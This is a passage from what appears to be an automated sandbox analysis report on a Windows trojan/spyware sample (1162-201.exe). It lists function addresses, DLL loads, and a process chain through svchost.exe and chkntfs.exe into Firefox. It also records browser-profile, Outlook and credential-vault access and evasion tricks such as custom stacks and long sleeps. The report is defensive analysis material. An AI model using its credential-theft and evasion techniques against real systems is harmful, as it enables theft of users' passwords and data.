                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044C516C6_2_044C516C
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0447F1726_2_0447F172
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0455B16B6_2_0455B16B
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0449B1B06_2_0449B1B0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AB2C06_2_044AB2C0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045312ED6_2_045312ED
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044952A06_2_044952A0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0447D34C6_2_0447D34C
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454132D6_2_0454132D
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044D739A6_2_044D739A
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04509C326_2_04509C32
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FCF26_2_0454FCF2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04493D406_2_04493D40
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04541D5A6_2_04541D5A
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04547D736_2_04547D73
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AFDC06_2_044AFDC0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04499EB06_2_04499EB0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FF096_2_0454FF09
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04453FD56_2_04453FD5
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04453FD26_2_04453FD2
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04491F926_2_04491F92
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FFB16_2_0454FFB1
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044FD8006_2_044FD800
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044938E06_2_044938E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044999506_2_04499950
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AB9506_2_044AB950
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_045259106_2_04525910
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04547A466_2_04547A46
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FA496_2_0454FA49
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04503A6C6_2_04503A6C
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0453DAC66_2_0453DAC6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044D5AA06_2_044D5AA0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04531AA36_2_04531AA3
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0452DAAC6_2_0452DAAC
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0454FB766_2_0454FB76
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_04505BF06_2_04505BF0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044CDBF96_2_044CDBF9
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044AFB806_2_044AFB80
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_024926A06_2_024926A0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_024AC4606_2_024AC460
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248B6E06_2_0248B6E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248D7006_2_0248D700
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248D4D86_2_0248D4D8
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248D4E06_2_0248D4E0
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248B8256_2_0248B825
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248B8306_2_0248B830
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_02493F6B6_2_02493F6B
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_02493F706_2_02493F70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_02495D706_2_02495D70
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_042AE4B36_2_042AE4B3
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_042AE3986_2_042AE398
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_042AE8506_2_042AE850
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_042AD9186_2_042AD918
                Source: C:\Users\user\Desktop\1162-201.exeCode function: String function: 00C40A30 appears 39 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 044D7E54 appears 111 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0447B970 appears 280 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 044C5130 appears 58 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 0450F290 appears 105 times
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: String function: 044FEA12 appears 86 times
                Source: 1162-201.exe, 00000000.00000003.2157187443.00000000039E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1162-201.exe
                Source: 1162-201.exe, 00000000.00000003.2157376467.0000000003B8D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1162-201.exe
                Source: 1162-201.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/12
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C937B5 GetLastError,FormatMessageW,0_2_00C937B5
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C810BF AdjustTokenPrivileges,CloseHandle,0_2_00C810BF
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C816C3
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C951CD
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8D4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C8D4DC
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C8719E CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,0_2_00C8719E
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C242A2
                Source: C:\Users\user\Desktop\1162-201.exeFile created: C:\Users\user\AppData\Local\Temp\reindulgingJump to behavior
                Source: 1162-201.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: chkntfs.exe, 00000006.00000003.2759955837.00000000026F4000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002724000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.00000000026F4000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2759832671.00000000026D4000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.00000000026FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 1162-201.exeVirustotal: Detection: 35%
                Source: 1162-201.exeReversingLabs: Detection: 57%
                Source: unknownProcess created: C:\Users\user\Desktop\1162-201.exe "C:\Users\user\Desktop\1162-201.exe"
                Source: C:\Users\user\Desktop\1162-201.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1162-201.exe"
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\1162-201.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1162-201.exe"Jump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeProcess created: C:\Windows\SysWOW64\chkntfs.exe "C:\Windows\SysWOW64\chkntfs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ifsutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 1162-201.exeStatic file information: File size 1618432 > 1048576
                Source: 1162-201.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 1162-201.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 1162-201.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 1162-201.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 1162-201.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 1162-201.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 1162-201.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: chkntfs.pdbGCTL source: svchost.exe, 00000002.00000002.2579030580.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547680523.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000003.2702996343.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4618836793.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OtAlYRopPg.exe, 00000005.00000000.2502672174.000000000010E000.00000002.00000001.01000000.00000005.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645298930.000000000010E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 1162-201.exe, 00000000.00000003.2158408076.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, 1162-201.exe, 00000000.00000003.2158241457.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2488633914.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2486363849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2581479681.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2578935147.00000000040F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 1162-201.exe, 00000000.00000003.2158408076.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, 1162-201.exe, 00000000.00000003.2158241457.00000000038C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2579237033.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2488633914.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2486363849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2581479681.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2578935147.00000000040F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: chkntfs.pdb source: svchost.exe, 00000002.00000002.2579030580.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547680523.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000003.2702996343.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000005.00000002.4618836793.0000000000698000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: chkntfs.exe, 00000006.00000002.4625579447.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645872739.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2883330637.00000000124DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: chkntfs.exe, 00000006.00000002.4625579447.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.4617121660.0000000002678000.00000004.00000020.00020000.00000000.sdmp, OtAlYRopPg.exe, 00000007.00000000.2645872739.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2883330637.00000000124DC000.00000004.80000000.00040000.00000000.sdmp
                Source: 1162-201.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 1162-201.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 1162-201.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 1162-201.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 1162-201.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C242DE
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C40A76 push ecx; ret 0_2_00C40A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004179D0 push cs; ret 2_2_004179D9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403250 push eax; ret 2_2_00403252
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418A37 push eax; iretd 2_2_00418A41
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418AFA push ecx; iretd 2_2_00418B07
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414AA3 push edi; retf 2_2_00414AAE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040837A push D2B59A72h; retf 2_2_00408389
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412308 push ebp; iretd 2_2_00412331
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013D7 pushad ; iretd 2_2_004013DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013E0 pushad ; iretd 2_2_004013E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D41F push 84DD7E08h; ret 2_2_0040D42B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040156D push dword ptr [eax-65h]; ret 2_2_00401577
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E64B push edx; retf 2_2_0041E650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417E3D push ds; iretd 2_2_00417E3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016A0 push 905F3456h; iretd 2_2_004016AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414F5F push ds; ret 2_2_00414F61
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320225F pushad ; ret 2_2_032027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032027FA pushad ; ret 2_2_032027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx2_2_032309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320283D push eax; iretd 2_2_03202858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320135E push eax; iretd 2_2_03201369
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044527FA pushad ; ret 6_2_044527F9
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0445225F pushad ; ret 6_2_044527F9
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0445283D push eax; iretd 6_2_04452858
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_044809AD push ecx; mov dword ptr [esp], ecx6_2_044809B6
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0249E3F3 push ebp; iretd 6_2_0249E401
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0249477D push cs; ret 6_2_02494786
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_02494BEA push ds; iretd 6_2_02494BEB
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0249B3F8 push edx; retf 6_2_0249B3FD
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_0248F0B5 push ebp; iretd 6_2_0248F0DE
                Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 6_2_02485127 push D2B59A72h; retf 6_2_02485136
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C3F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C3F98E
                Source: C:\Users\user\Desktop\1162-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\1162-201.exeAPI/Special instruction interceptor: Address: 314CDE4
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
                Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 1209Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeWindow / User API: threadDelayed 8764Jump to behavior
                Source: C:\Users\user\Desktop\1162-201.exeAPI coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\chkntfs.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\chkntfs.exe TID: 6508Thread sleep count: 1209 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exe TID: 6508Thread sleep time: -2418000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exe TID: 6508Thread sleep count: 8764 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exe TID: 6508Thread sleep time: -17528000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192Thread sleep time: -42000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192Thread sleep count: 40 > 30Jump to behavior
                Source: C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe TID: 3192Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\chkntfs.exeLast function: Thread delayed
